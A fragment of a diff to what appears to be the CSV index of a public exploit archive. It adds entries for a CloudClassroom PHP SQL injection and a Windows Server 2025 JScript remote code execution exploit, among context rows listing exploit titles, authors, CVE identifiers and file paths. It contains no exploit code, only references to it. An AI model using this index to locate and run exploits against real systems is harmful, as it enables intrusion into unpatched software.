 38049,exploits/multiple/remote/38049.txt,"Greenstone - Multiple Vulnerabilities",2012-11-23,AkaStep,remote,multiple,,2012-11-23,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/56662/info
 31912,exploits/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",remote,multiple,,2014-04-09,2014-04-09,0,CVE-2008-7170;OSVDB-53482,,,,,https://www.securityfocus.com/bid/29718/info
@@ -16131,6 +16135,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 11162,exploits/php/webapps/11162.txt,"CLONEBID B2B Marketplace - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",webapps,php,,2010-01-15,,1,OSVDB-61811,,,,,
 47544,exploits/php/webapps/47544.py,"ClonOs WEB UI 19.09 - Improper Access Control",2019-10-25,"İbrahim Hakan Şeker",webapps,php,,2019-10-25,2019-10-25,0,CVE-2019-18418,,,,,
 30070,exploits/php/webapps/30070.html,"ClonusWiki 0.5 - 'index.php' HTML Injection",2007-05-22,"John Martinelli",webapps,php,,2007-05-22,2013-12-06,1,,,,,,https://www.securityfocus.com/bid/24101/info
+52314,exploits/php/webapps/52314.txt,"CloudClassroom PHP Project 1.0 - SQL Injection",2025-06-05,"Sanjay Singh",webapps,php,,2025-06-05,2025-06-05,0,CVE-2025-45542,,,,,
 19549,exploits/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",webapps,php,,2012-07-03,2012-07-03,0,OSVDB-83690,,,,,
 19600,exploits/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,webapps,php,,2012-07-05,2012-07-05,0,OSVDB-84678;OSVDB-84677;OSVDB-84676;OSVDB-84675;OSVDB-84674;OSVDB-84673,,,,,https://www.vulnerability-lab.com/get_content.php?id=574
 12423,exploits/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,webapps,php,,2010-04-26,,1,OSVDB-64098;CVE-2010-1660,,,,,
@@ -44745,6 +44750,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2355,exploits/windows/remote/2355.pm,"Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",remote,windows,445,2006-09-12,,1,OSVDB-27845;CVE-2006-3439;MS06-040,"Metasploit Framework (MSF)",,,,
 47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)",2019-10-29,"Thomas Zuk",remote,windows,,2019-10-29,2020-12-11,0,CVE-2015-0008,,,,,
 47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)",2019-10-29,"Thomas Zuk",remote,windows,,2019-10-29,2020-12-11,0,CVE-2015-0009,,,,,
+52315,exploits/windows/remote/52315.py,"Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)",2025-06-05,"Mohammed Idrees Banyamer",remote,windows,,2025-06-05,2025-06-05,0,CVE-2025-30397,,,,,
 28482,exploits/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)",2013-09-23,Metasploit,remote,windows,,2013-09-23,2013-09-23,1,CVE-2013-0810;OSVDB-97136;MS13-071,"Metasploit Framework (MSF)",,,,
 46220,exploits/windows/remote/46220.txt,"Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution",2019-01-22,"Eduardo Braun Prado",remote,windows,,2019-01-22,2019-01-22,0,,,,,,
 34931,exploits/windows/remote/34931.c,"Microsoft Windows Vista - 'lpksetup.exe oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",remote,windows,,2010-10-25,2014-10-10,1,,,,,,https://www.securityfocus.com/bid/44414/info
